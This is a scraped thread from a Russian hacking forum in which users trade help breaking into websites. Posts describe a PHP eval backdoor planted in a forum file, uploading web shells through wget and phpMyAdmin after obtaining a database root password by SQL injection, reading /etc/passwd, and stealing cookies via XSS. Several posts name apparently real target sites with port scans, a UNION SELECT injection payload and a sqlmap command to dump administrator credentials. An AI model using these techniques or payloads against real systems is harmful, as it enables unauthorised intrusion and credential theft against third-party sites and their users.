ANTICHAT — форум по информационной безопасности, OSINT и технологиям

такая кавычка не режется, print(`ls -la`) сработало...но теперь похоже режутся слэши...ни ls ../,ни ls ..\ не срабатывает...соотв-но,залиться тоже не получается...

есть ещё варианты?

help

Парни, хелп!

Не получается продвинуть далее.

Есть булковский форум, прописал в faq_complite eval($_GET[e]);.

Вроде бы все хорошо, пхп инфо выводиться, но вот только:

Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).

Заранее спасибо

пропиши eval(base64_decode($_GET[e]));

и юзай курл

Привет всем!

Помогите пожалуйста разобраться с XSS-уязвимостями. Не совсем понятно, как использовать их, чтобы к примеру получить чужие cookies, а не свои.

Что делать с такого вида уязвимостями?

или

Также интересует уязвимости типа "HTML form without CSRF protection" можно использовать для подмены данных или не только?

Сообственно впервые столкнулся с такой проблемой)

Вообщем через скуль добыл пасс от рута мускула , на сайте есть phpmyadmin

Сообственно пытался залить шелл через пхпмуадмин и столкнулся с такой проблемой

а именно с определение пути к сайту

например мой сайт называется sqlinject.com

sqlinject.com/news.php?id=1'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhost/sql.com/news.php on line 63

так же в корне присувствует файл phpinfo в котором путь так же прописан таким образом /var/www/vhost/sql.com/phpinfo.php

Решил посмотреть сайты на одном ип в итоге получил список из 50+ сайтов... попробовал просканить эти сайты на директории и файлы оказалось что в каждом сайте присувствуют такие файлы config.php, connect.php, phpinfo.php и еще куча файлов. вообщем файлы одни и теже на каждом сайте... это я клоню к тому что файлы эти посути лежат в одной директории, но контент на сайтах разный совершенно...

в файле phpinfo.php на каждом сайте один и тот же путь) "/var/www/vhost/sql.com/phpinfo.php"

Пробовал прочитать файл через LOAD_FILE например phpinfo с пути написанного выше) не читает... хотя /etc/passwd читает)

Чисто для читалки попробовал залить минишелл через пхпмуадмин в /tmp/

Шелл залился и прочитался через LOAD_FILE

Сообственно интересует вопрос возможно ли как-то получить настоящий путь к сайту sqlinject.com, что бы залится)

Мб есть у кого какие нить соображения по этому поводу?)

Есть папочка icons от апача) но она походу не доступна для записи) да и путь искать надо)

Если есть у кого желание помочь и поломать голову)) могу предоставить root;pass к phpmyadmin ))

http://bkwar.ru/news/?topic=494 Протестил через Хавиж (ну первонюбские примычки) Скюля методом стринг. Хавиж выводит Бд всё нормально таблицы и так далее...

Ихнее http://bkwar.ru/www/labirint3/ulldie.php Пхпинфо

ИСП мэнэджер тут https://bkwar.ru:1500/

Ещё БД тут http://bkwar.ru/pgadmin/

Открытые порты сканеные через нмап : 110 , 143, 1500 , 21 ,22 , 443 , 4444 ,5000 ,53 , 993 ,995 ну и соотвественно 80.

Что нашёл webshag Напишу более подозрительные

/robots.txt found. It might be interesting to have a look inside.

/bin/ Directory indexing is enabled: CGI directory

/bin/ This might be interesting... possibly a system shell found.

/webmail/src/read_body.php This might be interesting... has been seen in web logs from an unknown scanner.

Ну есть ещё уйма директорий ...

А да сканер Дирбустер показал это : http://bkwar.ru/myadmin/setup/index.php

Пробовал разные варианты прочитанные и не прочитанные. А у них отключенно выползание ерророк (тут и ступор).

Недельки две мучаюсь. может подскажите как как всё это преодолеть и вынести результат в браузер.

Прошу прощение если не туда всунул вопрос. Ещё не освоился у вас...

нужно вывести username,password при помощи sqlmap, где usertype=Administrator

http://blindcanadians.ca/press_releases/index.php?BriefID=50+union+select+concat_ws(0x3a,u sername,password)+from+users+where+usertype='Admin istratot'+--+

так дампится вся база, как сделать так, чтобы выводился только Administrator?

sqlmap -u "http://blindcanadians.ca/press_releases/index.php?BriefID=50" --dump -T users -v 1